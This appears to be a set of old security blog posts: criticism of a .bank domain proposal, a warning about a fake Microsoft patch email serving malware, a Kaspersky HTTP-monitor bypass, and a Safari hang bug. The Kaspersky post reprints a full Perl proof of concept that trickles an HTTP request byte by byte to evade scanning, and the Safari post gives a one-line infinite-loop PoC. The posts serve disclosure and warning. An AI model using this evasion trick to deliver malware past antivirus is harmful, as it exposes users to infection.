And only banks, that’s what Mikko Hypponen, Chief Research Officer at F-secure, has announced a few days ago. If financial institutions are the only ones that can use a bank-tld the end of phishing could be near.

As we all know, a lot of phishing-site are exact copies of the original sites, and only the domainname differences. So, what does Mikko think? That using the bank-tld will make people understand the difference? A lot of people trust their bank and are not smart enough to check the tld.
And if we look a little bit further, what is going to restrict a phisher to get access to a subdomein? Of course, Mikko has a point, but his solutions is just not enough!
If we don’t teach our kids, parents, grandpa’s and grandma’s how to see the difference, the problem will not pass with a simple tld!

On top of that, even if you have the right site, you’re not perfectly secure. Hackers showed us that a few weeks ago, when they cracked the text-message-security from the CommonWealth Bank in Australia.

It looks like there’s a nasty email going around the net, with the purpose of telling people there is a new Microsoft Patch available. But there isn’t a new one…. The spammers are using the fact that MS Windows has got a lot of vulnerabilities in the past to tell people that another one is found and a patch is available. When people click the link in the email it does NOT bring them to the proposed url (http://www.microsoft.com/patches-win-logon-critical/winlogon_patchV1.12.exe) but it brings them to a redcallao.com subdir, which has a bogus winlogon_patchV1.12.exe-file. Only a few virusscanners are detecting this thing now (ISC reports only 8 of them) so you be warned!

Update
See http://forum.kaspersky.com/index.php?s=dde13e274b2e7f67b43fe425ae8a0ecd&showtopic=14734&st=0&p=120857&#entry120857 for a reaction from KAV, it is not broken!

It looks like Kaspersky has made a little error in their HTTP monitor. In Kaspersky antivirus 6 and Kaspersky internet security 6 it is possible to bypass the HTTP virus monitor. This happens because of HTTP parsing errors. john@[removespam]kak-sam.to has made some exploit code available:

This perl script could be run with ActiveState Perl 5.8:

use IO::Socket::INET;
use strict;

my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',
                                  'http://www.eicar.com/download/eicar.com' );

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)n";

my $s = IO::Socket::INET->new( PeerAddr => $h_srv,
                               PeerPort => $h_port,
                               Proto    => 'tcp' );
die "socket: $!" unless $s;

sendthem( $s,
          "GET $h_url HTTP/1.1",
          "Host: $h_srv",
          ""
    );
my $doc = read_body( $s, read_headers( $s ) );
syswrite STDOUT,
    'document is < '.$doc.'> len='.length($doc)."n";

sub sendthem {
    my $s = shift;
    my $c = 0;
    foreach( @_ ) {
        my @a = split //, $_;
        ++$c;
        syswrite STDOUT, "query $c: ";
        foreach( @a ) {
            sendone( $s, $_ );
        }
        sendone( $s, "r" );
        sendone( $s, "n" );
    }
}

sub sendone {
    my( $s, $v ) = @_;
    $s->syswrite( $v );
    syswrite STDOUT, $v;
# !!! comment next line to have monitoring working 
    select( undef, undef, undef, 0.300 );
}

sub read_headers {
    my( $s ) = @_;
    my( $c, $cl ) = ( 0, 0 );
    for( ;; ) {
        my $l = read_line( $s );
        ++$c;
        syswrite STDOUT, "header $c: $l";
        syswrite STDOUT, "rn";
        last if not $l and $c;
        $cl = $1 if $l =~ /^Content-Length:s+(d+)/;
    }
    $cl;
}

sub read_line {
    my( $s ) = @_;
    my $str = '';
    for( ;; ) {
        my $v = '';
        my $r = $s->sysread( $v, 1 );
        die 'EOF reading headers!' unless $r;
        last if $v eq "n";
        next if $v eq "r";
        $str .= $v;
    }
    return $str;
}

sub read_body {
    my( $s, $cl ) = @_;
    my( $str, $cli ) = ( '', $cl );
    syswrite STDOUT, "reading body  ...n";
    for( ;; ) {
        my $v = '';
        my $r = $s->sysread( $v, 1 );
        last unless $r;
        $str .= $v;
        --$cl if $cli;
        last if not $cl and $cli;
    }
    return $str;
}

Securiteam.com reports a bug in Safari a bug in Safari which makes the famous SRCOD (Spinning Rainbow Cursor Of Death) appear. They are reporting that Safari 2.0.3 (417.9.3) under Mac OS X 10.4.6. is vulnerable, but earlier version may be vulnerable too. The PoC-code looks like this:

for (;;);

Just put this between script-tags in a HTML-file and open it. The only solution they see right now is to disable javascript.